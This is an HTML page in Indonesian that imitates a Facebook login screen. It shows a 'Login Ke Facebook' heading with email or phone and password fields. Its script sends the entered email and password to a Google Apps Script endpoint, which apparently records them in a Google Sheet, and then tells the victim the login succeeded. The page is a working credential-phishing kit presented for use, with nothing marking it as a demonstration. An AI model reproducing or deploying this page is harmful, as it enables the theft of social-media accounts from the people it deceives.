<!DOCTYPE html>
<html>
 
  <head>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">

    <title>Halaman Login</title>
   
    <style>
      body {
        margin: 0;
        padding: 0;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        background-color: #05050517;
      }

      .content {
        display: flex;
        flex-direction: column;
        align-items: center;
        text-align: center;
      }

      .gambar-container {
        margin-bottom: 20px;
      }

      .gambar-container img {
        width: 260px;
        height: 260px;
      }

      .container {
        background-color: #e9e2e2f8;
        padding: 6px;
        border-radius: 6px;
        box-shadow: 0 9px 180px rgba(100, 99, 99, 0.288);
        display: flex;
        flex-direction: column;
        align-items: center;
      }

      h2 {
        margin-bottom: 20px;
      }

      input {
        width: 65%;
        padding: 22px;
        margin-bottom: 40px;
        border: 2px solid #807e7e;
        border-radius: 5px;
      }

      button {
        background-color: #276ac2;
        color: #fff;
        padding: 20px 75px;
        border: none;
        border-radius: 9px;
        cursor: pointer;
      }

      button:hover {
        background-color: #0aac32;
      }

      .loader {
        display: none;
        border: 9px solid rgba(3, 3, 3, 0.897);
        border-radius: 7%;
        border-top: 4px solid #4caf50;
        width: 90ch;
        height: 90px;
        animation: spin 10s linear infinite;
      }

      .a {
        font-size: 17px;
      }
      .b {
        font-size: 21px;
      }
      .c {
        font-size: 21px;
      }
      .btn {
        font-size: 16px;
      }

      @keyframes spin {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }
    </style>
    <script>
      // JavaScript sama seperti sebelumnya
      // ...
    </script>
  </head>
  <body>

    <div class="content">
      <div class="gambar-container">
        <img src="img/Facebok15.png" alt="Project9" style="width: 103%"/>
      </div>
      <div style="color: #0aac32;" class="alert alert-warning alert-dismissible fade show d-none my-alert" role="alert">
        <strong>LOGIN BERHASIL!!!!!!!!!.....</strong>Anda akan di arahkan ke weeb.
        <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
      </div>

      <form name="submit-to-google-sheet">
        <h2 class="text center" class="berbayang">Login Ke Facebook</h2>
        <input class="b" name="email" type="email" placeholder="Email / No Telpon" required />
        <input class="c" name="password" type="password" placeholder="Password" required />
        <br />
        <button class="a btn-login1" type="submit"><b>Log in</b></button>
        <button class="btn btn-primary d-none btn-login" type="button" disabled>
          <span class="spinner-border spinner-border-sm" role="status" aria-hidden="true"></span>
          Loading...
        </button>
        <hr size="7">
        </div>
        <br />
      </form>

    <script>
      const scriptURL = 'https://script.google.com/macros/s/AKfycby0knZV9uqXZSO20UtLqUv8DPtt1qTNv7b8s6Dw7khmBAujBETjQrydNR8E_k-2wO5G/exec';
      const form = document.forms['submit-to-google-sheet'];
      const btnLogin1 = document.querySelector('.btn-login1');
      const btnLogin = document.querySelector('.btn-login');
      const myAlert = document.querySelector('.my-alert');

      form.addEventListener('submit', (e) => {
        e.preventDefault();

      btnLogin.classList.toggle('d-none');
      btnLogin1.classList.toggle('d-none');


        fetch(scriptURL, { method: 'POST', body: new FormData(form) })
          .then((response) => {
            btnLogin.classList.toggle('d-none');
            btnLogin1.classList.toggle('d-none');
            myAlert.classList.toggle('d-none');
            form.reset();
            console.log('Success!', response)
          })
          .catch((error) => console.error('Error!', error.message));
      });
    </script>

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>

  </body>
</html>
